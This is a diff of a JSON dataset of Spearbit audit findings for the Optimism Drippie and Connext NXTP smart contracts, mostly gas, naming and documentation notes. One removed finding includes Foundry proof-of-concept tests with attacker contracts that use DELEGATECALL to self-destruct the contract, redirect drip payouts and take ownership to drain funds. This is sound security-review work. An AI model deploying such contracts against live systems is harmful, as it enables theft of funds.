to the Connext Diamond contract. If these tokens are the same as canonical tokens it wouldn't play nicely with the cap on these tokens. For other tokens it might also be relevant to have a cap. function addLiquidity(...) ... { ... token.safeTransferFrom(msg.sender, address(this), amounts[i]); ... }", "labels": [ "Spearbit", - "OptimismDrippie", - "Severity: Low Risk" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "Ownership Initialization and Transfer Safety on Owned.setOwner", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", - "body": "Consider the following scenarios. Scenario 1 Drippie allows the owner to be both initialized and set to address(0). If this scenario happens nobody will be able to manage the Drippie contract, thus preventing any of the following operations: Creating a new drip Updating a drips status (pausing, activating or archiving a drip) If set to the zero address, all the onlyOwner operations in AssetReceiver and Transactor will be uncallable. This scenario where the owner can be set to address(0) can occur when address(0) is passed to the construc- tor or setOwner. Scenario 2 owner may be set to address(this). Given the static nature of DripAction.target and DripAction.data there is no benefit of setting owner to address(this), and all instances can be assumed to have been done so in error.", + "title": "Simplify _swapAssetOut()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The function _swapAssetOut() has relatively complex logic where it first checks the tokens that will be received and then performs a swap. It prevents reverting by setting the success flag. However, the function repayAavePortal() still reverts if this flag is not set. The comments show this was meant for reconcile(); however, repaying the Aave debt in the reconcile phase no longer exists. So _swapAssetOut() could just revert if insufficient tokens are provided. This way it would also be more similar to _swapAsset(). This will make the code more readable and save some gas. AssetLogic.sol function _swapAssetOut(...) ... returns ( bool success, ...) { ... if (ipool.exists()) { ... // Calculate slippage before performing swap. 
// NOTE: This is less efficient than relying on the `swapInternalOut` revert, but makes it easier // to handle slippage failures (this can be called during reconcile, so must not fail). ... if (_maxIn >= ipool.calculateSwapInv(tokenIndexIn, tokenIndexOut, _amountOut)) { success = true; amountIn = ipool.swapInternalOut(tokenIndexIn, tokenIndexOut, _amountOut, _maxIn); } } else { ... uint256 _amountIn = pool.calculateSwapOutFromAddress(_assetIn, _assetOut, _amountOut); if (_amountIn <= _maxIn) { success = true; ... amountIn = pool.swapExactOut(_amountOut, _assetIn, _assetOut, _maxIn, block.timestamp + 3600); } } } function swapFromLocalAssetIfNeededForExactOut(...) { ... return _swapAssetOut(_key, _asset, adopted, _amount, _maxIn); } PortalFacet.sol function repayAavePortal(...) { ... (bool success, ..., ...) = AssetLogic.swapFromLocalAssetIfNeededForExactOut(...); if (!success) revert PortalFacet__repayAavePortal_swapFailed(); ... }", "labels": [ "Spearbit", - "OptimismDrippie", - "Severity: Low Risk" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "Unchecked Return and Handling of Non-standard Tokens in AssetReceiver", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", - "body": "The current AssetReceiver contract implement \"direct\" ETH and ERC20 token transfers, but does not cover edge cases like non-standard ERC20 tokens that do not: revert on failed transfers adhere to ERC20 interface (i.e. no return value) An ERC20 token that does not revert on failure would cause the WithdrewERC20 event to emit even though no transfer took place. An ERC20 token that does not have a return value will revert even if the call would have otherwise been successful. Solmate libraries already used inside the project offer a utility library called SafeTransferLib.sol which covers such edge cases. Be aware of the developer comments in the natspec: /// @dev Use with caution! Some functions in this library knowingly create dirty bits at the destination of the free memory pointer. /// @dev Note that none of the functions in this library check that a token has code at all! That responsibility is delegated to the caller.", + "title": "Return default false in the function end", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The verify function is missing a default return value. A return value of false can be added at the end of the function.", "labels": [ "Spearbit", - "OptimismDrippie", - "Severity: Low Risk" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "AssetReceiver Allows Burning ETH, ERC20 and ERC721 Tokens", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", - "body": "AssetReceiver contains functions that allow the owner of the contract to withdraw ETH, ERC20 and ERC721 tokens. Those functions allow specifying the receiver address of ETH, ERC20 and ERC721 tokens but they do not check that the receiver address is not address(0). By not doing so, those functions allow to: Burn ETH if sent to address(0). Burn ERC20 tokens if sent to address(0) and the ERC20 _asset allow tokens to be burned via transfer (For example, Solmates ERC20 allow that, OpenZeppelin instead will revert if the recipient is address(0)). 
Burn ERC721 tokens if sent to address(0) and the ERC721 _asset allow tokens to be burned via trans- ferFrom (For example, both Solmate and OpenZeppelin implementations prevent to send the _id to the address(0) but you dont know if that is still true about custom ERC721 contract that does not use those libraries).", + "title": "Change occurrences of whitelist to allowlist", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "In the codebase, whitelist is used to represent entities or objects that are allowed to be used or perform certain tasks. This word is not very accurate/suggestive and can also be offensive.", "labels": [ "Spearbit", - "OptimismDrippie", - "Severity: Low Risk" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "AssetReceiver Not Implementing onERC721Received Callback Required by safeTransferFrom.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", - "body": "AssetReceiver contains the function withdrawERC721 that allow the owner to withdraw ERC721 tokens. As stated in the EIP-721, the safeTransferFrom (used by the sender to transfer ERC721 tokens to the AssetRe- ceiver) will revert if the target contract (AssetReceiver in this case) is not implementing onERC721Received and returning the expected value bytes4(keccak256(\"onERC721Received(address,address,uint256,bytes)\")).", + "title": "Incorrect comment on _mirrorConnector", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The comment on _mirrorConnector is incorrect as this does not denote the address of the spoke connector", "labels": [ "Spearbit", - "OptimismDrippie", - "Severity: Low Risk" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "Both Transactor.CALL and Transactor.DELEGATECALL Do Not Emit Events", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", - "body": "Transactor contains a \"general purpose\" DELEGATECALL and CALL function that allow the owner to execute a delegatecall and call toward a target address passing an arbitrary payload. Both of those functions are executing delegatecall and call without emitting any events. Because of the general- purpose nature of these function, it would be considered a good security measure to emit events to track the functions usage. Those events could be then used to monitor and track usage by external monitoring services.", + "title": "addStableSwapPool can have a more suggestive name and also better documentation for the _stableSwapPool input parameter is recommended", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "1. The name suggests we are adding a new pool, although we are replacing/updating the current one. 2. _stableSwapPool needs to implement IStableSwap and it is supposed to be an external stable swap pool. It would be best to indicate that and possibly change the parameter input type to IStableSwap _stableSwapPool. 3. _stableSwapPool provided by the owner or an admin can have more than just 2 tokens as the @notice comment suggests. For example, the pool could have oUSDC, nextUSDC, oDAI, nextDAI, ... . Also there are no guarantees that the pooled tokens are pegged to each other. There is also the potential for these pools to contain malicious or worthless tokens.
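To illustrate point 2, a minimal sketch of what the suggested typed signature could look like; the contract, the mapping, and the updateStableSwapPool rename below are hypothetical, not Connext's actual code:

interface IStableSwap {
    // interface the external stable swap pool is expected to implement
}

contract StableSwapRegistrySketch {
    mapping(bytes32 => IStableSwap) internal pools;

    // Hypothetical rename of addStableSwapPool: "update" reflects that any
    // existing pool registered for the canonical key is replaced, and the
    // IStableSwap parameter type documents the expected pool interface.
    // (Access control omitted for brevity.)
    function updateStableSwapPool(bytes32 _canonicalKey, IStableSwap _stableSwapPool) external {
        pools[_canonicalKey] = _stableSwapPool;
    }
}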
What external pools does the Connext team use or plan to use? This comment also applies to setupAsset and setupAssetWithDeployedRepresentation.", "labels": [ "Spearbit", - "OptimismDrippie", + "ConnextNxtp", "Severity: Informational" ] }, { - "title": "Both Transactor.CALL and Transactor.DELEGATECALL Do Not Check the Result of the Execution", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", - "body": "The Transactor contract contains a \"general purpose\" DELEGATECALL and CALL function that allow the owner to execute a delegatecall and call toward a target address passing an arbitrary payload. Both functions return the delegatecall and call result back to the caller without checking whether execution was successful or not. By not implementing such check, the transaction could fail silently. Another side effect is that the ETH sent along with the execution (both functions are payable) would remain in the Drippie contract and not transferred to the _target. Test example showcasing the issue: contract Useless { // A contract that have no functions // No fallback functions // Will not accept ETH (only from selfdestruct/coinbase) } function test_transactorCALL() public { Useless useless = new Useless(); bool success; vm.deal(deployer, 3 ether); vm.deal(address(drippie), 0 ether); vm.deal(address(useless), 0 ether); vm.prank(deployer); // send 1 ether via `call` to a contract that cannot receive them 8 (success, ) = drippie.CALL{value: 1 ether}(address(useless), \"\", 100000, 1 ether); assertEq(success, false); vm.prank(deployer); // Perform a `call` to a not existing target's function (success, ) = drippie.CALL{value: 1 ether}(address(useless), abi.encodeWithSignature(\"notExistingFn()\"), 100000, 1 ether); assertEq(success, false); assertEq(deployer.balance, 1 ether); assertEq(address(drippie).balance, 2 ether); assertEq(address(useless).balance, 0); ,! } function test_transactorDELEGATECALL() public { Useless useless = new Useless(); bool success; vm.deal(deployer, 3 ether); vm.deal(address(drippie), 0 ether); vm.deal(address(useless), 0 ether); vm.prank(deployer); // send 1 ether via `delegatecall` to a contract that cannot receive them (success, ) = drippie.DELEGATECALL{value: 1 ether}(address(useless), \"\", 100000); assertEq(success, false); vm.prank(deployer); // Perform a `delegatecall` to a not existing target's function (success, ) = drippie.DELEGATECALL{value: 1 ether}(address(useless), abi.encodeWithSignature(\"notExistingFn()\"), 100000); assertEq(success, false); assertEq(deployer.balance, 1 ether); assertEq(address(drippie).balance, 2 ether); assertEq(address(useless).balance, 0); ,! }", + "title": "_local has a misleading name in _addLiquidityForRouter and _removeLiquidityForRouter", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The name of the _local parameter is misleading, since it is used in _addLiquidityForRouter (TokenId memory canonical, bytes32 key) = _getApprovedCanonicalId(_local); and in _removeLiquidityForRouter TokenId memory canonical = _getCanonicalTokenId(_local); and we have the following call flow path: AssetLogic.getCanonicalTokenId uses the adoptedToCanonical mapping first, then checks if the input parameter is a canonical token for the current domain, then uses the representationToCanonical mapping.
So here _local could be an adopted token.", "labels": [ "Spearbit", - "OptimismDrippie", - "Severity: Low Risk" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "Transactor.DELEGATECALL Data Overwrite and selfdestruct Risks", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", - "body": "The Transactor contract contains a \"general purpose\" DELEGATECALL function that allow the owner to execute a delegatecall toward a target address passing an arbitrary payload. Consider the following scenarios: Scenario 1 A malicious target contract could selfdestruct the Transactor contract and as a consequence the contract that is inheriting from Transactor. Test example showcasing the issue: 9 contract SelfDestroyer { function destroy(address receiver) external { selfdestruct(payable(receiver)); } } function test_canOwnerSelftDestructDrippie() public { // Assert that Drippie exist assertStatus(DEFAULT_DRIP_NAME, Drippie.DripStatus.PAUSED); assertGt(getContractSize(address(drippie)), 0); // set it to active vm.prank(deployer); drippie.status(DEFAULT_DRIP_NAME, Drippie.DripStatus.ACTIVE); assertStatus(DEFAULT_DRIP_NAME, Drippie.DripStatus.ACTIVE); // fund the drippie with 1 ETH vm.deal(address(drippie), 1 ether); uint256 deployerBalanceBefore = deployer.balance; uint256 drippieBalanceBefore = address(drippie).balance; // deploy the destroyer SelfDestroyer selfDestroyer = new SelfDestroyer(); vm.prank(deployer); drippie.DELEGATECALL(address(selfDestroyer), abi.encodeWithSignature(\"destroy(address)\", deployer), gasleft()); ,! uint256 deployerBalanceAfter = deployer.balance; uint256 drippieBalanceAfter = address(drippie).balance; // assert that the deployer has received the balance that was present in Drippie assertEq(deployerBalanceAfter, deployerBalanceBefore + drippieBalanceBefore); assertEq(drippieBalanceAfter, 0); // Weird things happens with forge // Because we are in the same block the code of the contract is still > 0 so // Cannot use assertEq(getContractSize(address(drippie)), 0); // Known forge issue // 1) Forge resets storage var to 0 after self-destruct (before tx ends) 2654 -> https://github.com/foundry-rs/foundry/issues/2654 // 2) selfdestruct has no effect in test 1543 -> https://github.com/foundry-rs/foundry/issues/1543 assertStatus(DEFAULT_DRIP_NAME, Drippie.DripStatus.PAUSED); ,! } Scenario 2 The delegatecall allows the owner to intentionally, or accidentally, overwrite the content of the drips mapping. By being able to modify the drips mapping, a malicious user would be able to execute a series of actions like: Changing drips status: Activating an archived drip Deleting a drip by changing the status to NONE (this allows the owner to override entirely the drip by calling again create) Switching an active/paused drip to paused/active 10 etc.. Change drips interval: Prevent a drip from being executed any more by setting interval to a very high value Allow a drip to be executed more frequently by lowering the interval value Enable reentrancy by setting interval to 0 Change drips actions: Override an action to send drips contract balance to an arbitrary address etc.. 
Test example showcasing the issue: contract ChangeDrip { address public owner; mapping(string => Drippie.DripState) public drips; function someInnocentFunction() external { drips[\"FUND_BRIDGE_WALLET\"].config.actions[0] = Drippie.DripAction({ target: payable(address(1024)), data: new bytes(0), value: 1 ether }); } } 11 function test_canDELEGATECALLAllowReplaceAction() public { vm.deal(address(drippie), 10 ether); vm.deal(address(attacker), 0 ether); // Create an action with name \"FUND_BRIDGE_WALLET\" that have the function // To fund a wallet vm.startPrank(deployer); string memory fundBridgeWalletName = \"FUND_BRIDGE_WALLET\"; Drippie.DripAction[] memory actions = new Drippie.DripAction[](1); // The first action will send Bob 1 ether actions[0] = Drippie.DripAction({ target: payable(address(alice)), data: new bytes(0), value: 1 ether ,! }); Drippie.DripConfig memory config = createConfig(100, IDripCheck(address(checkTrue)), new bytes(0), actions); drippie.create(fundBridgeWalletName, config); drippie.status(fundBridgeWalletName, Drippie.DripStatus.ACTIVE); vm.stopPrank(); // Deploy the malicius contract vm.prank(attacker); ChangeDrip changeDripContract = new ChangeDrip(); // make the owner of drippie call via DELEGATECALL an innocentfunction of the exploiter contract vm.prank(deployer); drippie.DELEGATECALL(address(changeDripContract), abi.encodeWithSignature(\"someInnocentFunction()\"), 1000000); ,! // Now the drip action should have changed, anyone can execute it and funds would be sent to // the attacker and not to the bridge wallet drippie.drip(fundBridgeWalletName); // Assert we have drained Drippie assertEq(attacker.balance, 1 ether); assertEq(address(drippie).balance, 9 ether); } Scenario 3 Calling a malicious contract or accidentally calling a contract which does not account for Drippies storage layout can result in owner being overwritten. Test example showcasing the issue: contract GainOwnership { address public owner; function someInnocentFunction() external { owner = address(1024); } } 12 function test_canDELEGATECALLAllowOwnerLoseOwnership() public { vm.deal(address(drippie), 10 ether); vm.deal(address(attacker), 0 ether); // Deploy the malicius contract vm.prank(attacker); GainOwnership gainOwnershipContract = new GainOwnership(); // make the owner of drippie call via DELEGATECALL an innocentfunction of the exploiter contract vm.prank(deployer); drippie.DELEGATECALL(address(gainOwnershipContract), abi.encodeWithSignature(\"someInnocentFunction()\"), 1000000); ,! // Assert that the attacker has gained onwership assertEq(drippie.owner(), attacker); // Steal all the funds vm.prank(attacker); drippie.withdrawETH(payable(attacker)); // Assert we have drained Drippie assertEq(attacker.balance, 10 ether); assertEq(address(drippie).balance, 0 ether); }", + "title": "Document _calculateSwap's and _calculateSwapInv's calculations", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "In _calculateSwap, the -1 in dy = xp[tokenIndexTo] - y - 1 is actually important. This is because given no change in the asset balance of all tokens that already satisfy the stable swap invariant (dx = 0), getY (due to rounding errors) might return: y = xp[tokenIndexTo] which would in turn make dy = -1 that would revert the call. This case would need to be investigated. y = xp[tokenIndexTo] - 1 which would in turn make dy = 0 and so the call would return (0, 0).
y = xp[tokenIndexTo] + 1 which would in turn make dy = -2 that would revert the call. This case would need to be investigated. And similarly in _calculateSwapInv, doing the same analysis for + 1 in dx = x - xp[tokenIndexFrom] + 1, if getYD returns: xp[tokenIndexFrom] + 1, then dx = 2; xp[tokenIndexFrom], then dx = 1; xp[tokenIndexFrom] - 1, then dx = 0; Note that the behavior is different and the call would never revert.", "labels": [ "Spearbit", - "OptimismDrippie", - "Severity: Low Risk" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "Use calldata over memory", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", - "body": "Some gas savings if function arguments are passed as calldata instead of memory.", + "title": "Providing the from amount the same as the pool's from token balance, one might get a different return value compared to the current pool's to balance", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Note that, due to some imbalance in the asset pool, given x = xp[tokenIndexFrom] (i.e., no change in the asset balance of the tokenIndexFrom token in the asset pool), we might see a decrease or increase in the asset balance of tokenIndexTo to bring the pool back to satisfying the stable swap invariant. One source that can introduce an imbalance is when the scaled amplification coefficient is ramping.", "labels": [ "Spearbit", - "OptimismDrippie", - "Severity: Gas Optimization" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "Avoid String names in Events and Mapping Key", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", - "body": "Drip events emit an indexed nameref and the name as a string. These strings must be passed into every drip call adding to gas costs for larger strings.", + "title": "Document what type 0 means for TypedMemView", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "In the following line, 0 is passed as the new type for a TypedMemView bytes29 _message.slice(PREFIX_LENGTH, _message.len() - PREFIX_LENGTH, 0) But there is no documentation as to what type 0 signifies.", "labels": [ "Spearbit", - "OptimismDrippie", - "Severity: Gas Optimization" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "Avoid Extra sloads on Drippie.status", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", - "body": "Information for emitting event can be taken from calldata instead of reading from storage. Can skip repeat drips[_name].status reads from storage.", + "title": "Mixed use of require statements and custom errors", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The codebase includes a mix of require statements and custom errors.", "labels": [ "Spearbit", - "OptimismDrippie", - "Severity: Gas Optimization" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "Use Custom Errors Instead of Strings", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", - "body": "To save some gas the use of custom errors leads to cheaper deploy time cost and run time cost.
The run time cost is only relevant when the revert condition is met.", + "title": "WatcherManager can make watchers public instead of having a getter function", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "WatcherManager has a private mapping watchers and a getter function isWatcher() to query that mapping. Since WatcherManager is not inherited by any other contract, it is safe to make the mapping public to avoid the need for an explicit getter function.", "labels": [ "Spearbit", - "OptimismDrippie", - "Severity: Gas Optimization" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "Increment In The For Loop Post Condition In An Unchecked Block", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", - "body": "This is only relevant if you are using the default solidity checked arithmetic. i++ involves checked arithmetic, which is not required. This is because the value of i is always strictly less than length <= 2**256 - 1. Therefore, the theoretical maximum value of i to enter the for-loop body is 2**256 - 2. This means that the i++ in the for loop can never overflow. Regardless, the overflow checks are performed by the compiler. Unfortunately, the Solidity optimizer is not smart enough to detect this and remove the checks. One can manually do this by: for (uint i = 0; i < length; ) { // do something that doesn't change the value of i unchecked { ++i; } }", + "title": "Incorrect comment about relation between zero amount and asset", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "At BridgeFacet.sol#L514, if _amount == 0, _asset is allowed to have any user-specified value. _xcall() reverts when zero address is specified for _asset on a non-zero _amount: if (_asset == address(0) && _amount != 0) { revert BridgeFacet__xcall_nativeAssetNotSupported(); } However, according to this comment if amount is 0, _asset also has to be the zero address which is not true (since it uses IFF): _params.normalizedIn = _asset == address(0) ? 0 // we know from assertions above this is the case IFF amount == 0 : AssetLogic.normalizeDecimals(ERC20(_asset).decimals(), uint8(18), _amount);", "labels": [ "Spearbit", - "OptimismDrippie", - "Severity: Gas Optimization" + "ConnextNxtp", + "Severity: Informational" ] }, { - "title": "DripState.count Location and Use", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", - "body": "DripState.count is recorded and never used within the Drippie or IDripCheck contracts. DripState.count is also incremented after all external calls, inconsistent with Checks, Effects, Interactions con- vention.", + "title": "New Connector needs to be deployed if AMB changes", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The AMB address is configured to be immutable. If a chain's AMB changes, a new Connector needs to be deployed. /** * @notice Address of the AMB on this domain.
*/ address public immutable AMB;", "labels": [ "Spearbit", - "OptimismDrippie", + "ConnextNxtp", "Severity: Informational" ] }, { - "title": "Type Checking Foregone on DripCheck", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", - "body": "Passing params as bytes makes for a flexible DripCheck, however, type checking is lost.", + "title": "Functions should be renamed", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The following functions should be renamed to be aligned with the naming convention of the fxPortal contracts. OptimismHubConnector.processMessageFromRoot to OptimismHubConnector.processMessageFromChild ArbitrumHubConnector.processMessageFromRoot to ArbitrumHubConnector.processMessageFromChild ZkSyncHubConnector.processMessageFromRoot to ZkSyncHubConnector.processMessageFromChild", "labels": [ "Spearbit", - "OptimismDrippie", + "ConnextNxtp", "Severity: Informational" ] }, { - "title": "Confirm Blind ERC721 Transfers are Intended", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", - "body": "AssetReceiver uses transferFrom instead of safeTransferFrom. The callback on safeTransferFrom often poses a reentrancy risk but in this case the function is restricted to onlyOwner.", + "title": "Two functions named aggregate()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Both the contracts Multicall and RootManager have a function called aggregate(). This could be confusing. Contract Multicall doesn't seem to be used. Multicall.sol function aggregate(Call[] memory calls) public view returns (uint256 blockNumber, bytes[] memory returnData) { ... } RootManager.sol function aggregate(uint32 _domain, bytes32 _inbound) external whenNotPaused onlyConnector(_domain) { ... }", "labels": [ "Spearbit", - "OptimismDrippie", + "ConnextNxtp", "Severity: Informational" ] }, { - "title": "Code Contains Empty Blocks", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", - "body": "Its best practice that when there is an empty block, to add a comment in the block explaining why its empty. While not technically errors, they can cause confusion when reading code.", + "title": "Careful when using _removeAssetId()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The function _removeAssetId() removes an asset. Although it is called via authorized functions, mistakes could be made. If there are any representation assets left, they are worthless as they can't be bridged back anymore (unless reinstated via setupAssetWithDeployedRepresentation()). The representation assets might also be present and allowed in the StableSwap. If so, the owners of the worthless tokens could quickly swap them for real tokens. The canonical tokens will also be locked. function _removeAssetId(...) ... { ... }", "labels": [ "Spearbit", - "OptimismDrippie", + "ConnextNxtp", "Severity: Informational" ] }, { - "title": "Code Structure Deviates From Best-Practice", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", - "body": "The best-practice layout for a contract should follow this order: State variables. Events. Modifiers. Constructor. Functions.
Function ordering helps readers identify which functions they can call and find constructor and fallback functions easier. Functions should be grouped according to their visibility and ordered as: constructor, receive function (if ex- ists), fallback function (if exists), external, public, internal, private. Some constructs deviate from this recommended best-practice: structs and mappings after events.", + "title": "Unused import IAavePool in InboxFacet", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Contract InboxFacet imports IAavePool, however it doesn't use it. import {IAavePool} from \"../interfaces/IAavePool.sol\";", "labels": [ "Spearbit", - "OptimismDrippie", + "ConnextNxtp", "Severity: Informational" ] }, { - "title": "Missing or Incomplete NatSpec", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", - "body": "Some functions are missing @notice/@dev NatSpec comments for the function, @param for all/some of their parameters and @return for return values. Given that NatSpec is an important part of code documentation, this affects code comprehension, auditability and usability.", + "title": "Use IERC20Metadata", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The code imports OpenZeppelin's ERC20 implementation only to access the decimals() interface. It could instead use the IERC20Metadata interface from @openzeppelin/contracts/token/ERC20/extensions/IERC20Metadata.sol, which seems more logical. BridgeFacet.sol import {ERC20} from \"@openzeppelin/contracts/token/ERC20/ERC20.sol\"; ... function _xcall(...) ... { ... ... AssetLogic.normalizeDecimals(ERC20(_asset).decimals(), uint8(18), _amount); ... } AssetLogic.sol import {ERC20} from \"@openzeppelin/contracts/token/ERC20/ERC20.sol\"; ... function swapToLocalAssetIfNeeded(...) ... { ... ... calculateSlippageBoundary(ERC20(_asset).decimals(), ERC20(_local).decimals(), _amount, _slippage) ... ... } function swapFromLocalAssetIfNeeded(...) ... { ... ... calculateSlippageBoundary(uint8(18), ERC20(adopted).decimals(), _normalizedIn, _slippage) ... ... }", "labels": [ "Spearbit", - "OptimismDrippie", + "ConnextNxtp", "Severity: Informational" ] }, { - "title": "Checking Boolean Against Boolean", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", - "body": "executable returns a boolean in which case the comparison to true is unnecessary. executable also reverts if any precondition check fails in which case false will never be returned.", + "title": "Generic name of proposedTimestamp()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "The function proposedTimestamp() has a very generic name. As there are other Timestamp functions this might be confusing. function proposedTimestamp() public view returns (uint256) { return s._proposedOwnershipTimestamp; } function routerWhitelistTimestamp() public view returns (uint256) { return s._routerWhitelistTimestamp; } function assetWhitelistTimestamp() public view returns (uint256) { return s._assetWhitelistTimestamp; }", "labels": [ "Spearbit", - "OptimismDrippie", + "ConnextNxtp", "Severity: Informational" ] }, { - "title": "Drippie.executable Never Returns false Only true or Reverts", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", - "body": "
The executable implemented in the Drippie contract has the following signature From the signature and the natspec documentation @return True if the drip is executable, false other- wise. Without reading the code, a user/developer would expect that the function returns true if all the checks passes otherwise false but in reality the function will always return true or revert. Because of this behavior, a reverting drip that do not pass the requirements inside executable will never revert with the message present in the following code executed by the drip function require( executable(_name) == true, \"Drippie: drip cannot be executed at this time, try again later\" );", + "title": "Two different nonces", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "Both LibConnextStorage and SpokeConnector define a nonce. As the names are very similar this could be confusing. LibConnextStorage.sol struct AppStorage { ... * @notice Nonce for the contract, used to keep unique transfer ids. * @dev Assigned at first interaction (xcall on origin domain). uint256 nonce; ... } SpokeConnector.sol * @notice domain => next available nonce for the domain. mapping(uint32 => uint32) public nonces;", "labels": [ "Spearbit", - "OptimismDrippie", + "ConnextNxtp", "Severity: Informational" ] }, { - "title": "Drippie Use Case Notes", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", - "body": "Drippie intends to support use cases outside of the initial hot EOA top-up use case demonstrated by Optimism. To further clarify, weve noted that drips support: Sending eth External function calls with fixed params Preconditions Examples include, conditionally transferring eth or tokens. Calling an admin function iff preconditions are met. Drips do not support: Updating the drip contract storage Altering params Postconditions Examples include, vesting contracts or executing Uniswap swaps based on recent moving averages (which are not without their own risks). Where dynamic params or internal accounting is needed, a separate contract needs to be paired with the drip.", + "title": "Tips to optimize rootWithCtx", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", + "body": "To help with the optimization mentioned in the comment of rootWithCtx(), here is a way to count the trailing 0s: graphics.stanford.edu/~seander/bithacks.html#ZerosOnRightModLookup. function rootWithCtx(Tree storage tree, bytes32[TREE_DEPTH] memory _zeroes) internal view returns (bytes32 _current) { ... // TODO: Optimization: skip the first N loops where the ith bits are all 0 - start at that // depth with zero hashes. ... ,! }", "labels": [ "Spearbit", - "OptimismDrippie", + "ConnextNxtp", "Severity: Informational" ] }, { - "title": "Augment Documentation for dripcheck.check Indicating Precondition Check Only Performed", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/OptimismDrippie-Spearbit-Security-Review.pdf", - "body": "Before executing the whole batch of actions the drip function call executable that check if the drip can be executed. 
